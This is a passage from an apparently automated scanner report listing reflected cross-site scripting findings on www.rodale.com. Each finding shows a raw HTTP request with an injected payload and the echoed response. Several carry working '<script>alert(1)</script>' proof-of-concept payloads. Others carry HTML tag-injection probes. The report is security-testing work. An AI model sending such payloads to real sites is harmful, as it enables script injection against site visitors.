User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:43 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:44 GMT
Date: Thu, 10 Mar 2011 17:20:44 GMT
Content-Length: 22482
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page 1,6597,8-114,00.html9d818"><a>1374216a76b node node-958">
...[SNIP]...

2.131. http://www.rodale.com/1,6597,8-114,00.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /1,6597,8-114,00.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceb32"><a>698f26de323 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /1,6597,8-114,00.html?ceb32"><a>698f26de323=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:19:56 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:49:59 GMT
Date: Thu, 10 Mar 2011 17:19:59 GMT
Content-Length: 22471
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/1,6597,8-114,00.html?ceb32"><a>698f26de323=1" title="Register" class="moreLink">
...[SNIP]...

2.132. http://www.rodale.com/benefits-walking [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /benefits-walking

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7362f"><a>faf41ae25b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /benefits-walking7362f"><a>faf41ae25b4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:56 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:58 GMT
Date: Thu, 10 Mar 2011 17:05:58 GMT
Content-Length: 22464
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page benefits-walking7362f"><a>faf41ae25b4 node node-958">
...[SNIP]...

2.133. http://www.rodale.com/benefits-walking [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /benefits-walking

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bec2"><script>alert(1)</script>ec68e81f22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /benefits-walking?4bec2"><script>alert(1)</script>ec68e81f22b=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:56 GMT
Date: Thu, 10 Mar 2011 17:05:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=s63qiq0qr11ee9igm45mapavl7; path=/; domain=.rodale.com
Content-Length: 38442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/benefits-walking?4bec2"><script>alert(1)</script>ec68e81f22b=1&title=8+Astonishing+Benefits+of+Walking">
...[SNIP]...

2.134. http://www.rodale.com/cas [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /cas

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c9f"><a>433b5975bcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cas36c9f"><a>433b5975bcc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:55 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:56 GMT
Date: Thu, 10 Mar 2011 17:07:56 GMT
Content-Length: 22425
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page cas36c9f"><a>433b5975bcc node node-958">
...[SNIP]...

2.135. http://www.rodale.com/caslogin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /caslogin

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b839c"><a>38ac21ff284 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /casloginb839c"><a>38ac21ff284 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:35 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:36 GMT
Date: Thu, 10 Mar 2011 17:05:36 GMT
Content-Length: 22440
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page casloginb839c"><a>38ac21ff284 node node-958">
...[SNIP]...

2.136. http://www.rodale.com/chemicals-plastic [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /chemicals-plastic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e0c2"><a>cdc2ec784d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /chemicals-plastic9e0c2"><a>cdc2ec784d2 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:48 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:50 GMT
Date: Thu, 10 Mar 2011 17:05:50 GMT
Content-Length: 22467
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page chemicals-plastic9e0c2"><a>cdc2ec784d2 node node-958">
...[SNIP]...

2.137. http://www.rodale.com/chemicals-plastic [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /chemicals-plastic

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a391"><script>alert(1)</script>fb00446b477 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chemicals-plastic?8a391"><script>alert(1)</script>fb00446b477=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:47 GMT
Date: Thu, 10 Mar 2011 17:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=pnldn7gcqp6dvi8le115h9e464; path=/; domain=.rodale.com
Content-Length: 44125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/chemicals-plastic?8a391"><script>alert(1)</script>fb00446b477=1&title=All+Plastics+Are+Bad+for+Your+Body%2C+New+Study+Finds">
...[SNIP]...

2.138. http://www.rodale.com/contact [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /contact

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7bb9"><a>cdd3abcb2cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactd7bb9"><a>cdd3abcb2cc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:34 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:37 GMT
Date: Thu, 10 Mar 2011 17:07:37 GMT
Content-Length: 22437
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page contactd7bb9"><a>cdd3abcb2cc node node-958">
...[SNIP]...

2.139. http://www.rodale.com/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cc77"><a>02eecc34017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact?6cc77"><a>02eecc34017=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:49 GMT
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 17:06:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:06:51 GMT
Content-Length: 24362
Connection: close
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=gdnh48fudra7ftjrm96rk8irl0; path=/; domain=.rodale.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/contact?6cc77"><a>02eecc34017=1" title="Register" class="moreLink">
...[SNIP]...

2.140. http://www.rodale.com/cookware-comparison [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /cookware-comparison

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 470d9"><a>52365c65d77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cookware-comparison470d9"><a>52365c65d77 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:38 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:40 GMT
Date: Thu, 10 Mar 2011 17:07:41 GMT
Content-Length: 22473
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page cookware-comparison470d9"><a>52365c65d77 node node-958">
...[SNIP]...

2.141. http://www.rodale.com/cookware-comparison [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /cookware-comparison

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59909"><script>alert(1)</script>0387b9ce502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookware-comparison?59909"><script>alert(1)</script>0387b9ce502=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:36 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:07:38 GMT
Date: Thu, 10 Mar 2011 17:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=5fgvfhe6bcnq77b418rv6o9dh3; path=/; domain=.rodale.com
Content-Length: 40467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/cookware-comparison?59909"><script>alert(1)</script>0387b9ce502=1&title=How+to+Choose+the+Safest%2C+Healthiest%2C+Best-Cooking+Cookware">
...[SNIP]...

2.142. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19eb2"><a>ee15deb4ca8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp19eb2"><a>ee15deb4ca8/sub/0,,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:14 GMT
Date: Thu, 10 Mar 2011 17:20:14 GMT
Content-Length: 22508
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp19eb2"><a>ee15deb4ca8 corp19eb2">
...[SNIP]...

2.143. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baf1"><a>be12606df96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp/sub2baf1"><a>be12606df96/0,,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:42 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:43 GMT
Date: Thu, 10 Mar 2011 17:20:43 GMT
Content-Length: 22487
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp corp-sub2baf1"><a>be12606df96 node node-958">
...[SNIP]...

2.144. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e36"><script>alert(1)</script>f26dd7b40d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/0,,1-28,00.html96e36"><script>alert(1)</script>f26dd7b40d4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:21:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:51:11 GMT
Date: Thu, 10 Mar 2011 17:21:12 GMT
Content-Length: 22520
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/0,,1-28,00.html96e36"><script>alert(1)</script>f26dd7b40d4" title="Register" class="moreLink">
...[SNIP]...

2.145. http://www.rodale.com/corp/sub/0,,1-28,00.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/0,,1-28,00.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7ef5"><script>alert(1)</script>ca9085abe4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/0,,1-28,00.html?d7ef5"><script>alert(1)</script>ca9085abe4f=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:09 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:10 GMT
Date: Thu, 10 Mar 2011 17:20:10 GMT
Content-Length: 22530
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/0,,1-28,00.html?d7ef5"><script>alert(1)</script>ca9085abe4f=1" title="Register" class="moreLink">
...[SNIP]...

2.146. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 444b0"><a>207d0a98d65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp444b0"><a>207d0a98d65/sub/1,1874,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:20 GMT
Date: Thu, 10 Mar 2011 17:20:20 GMT
Content-Length: 22516
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp444b0"><a>207d0a98d65 corp444b0">
...[SNIP]...

2.147. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f86f1"><a>bd8b9252f57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /corp/subf86f1"><a>bd8b9252f57/1,1874,1-28,00.html HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
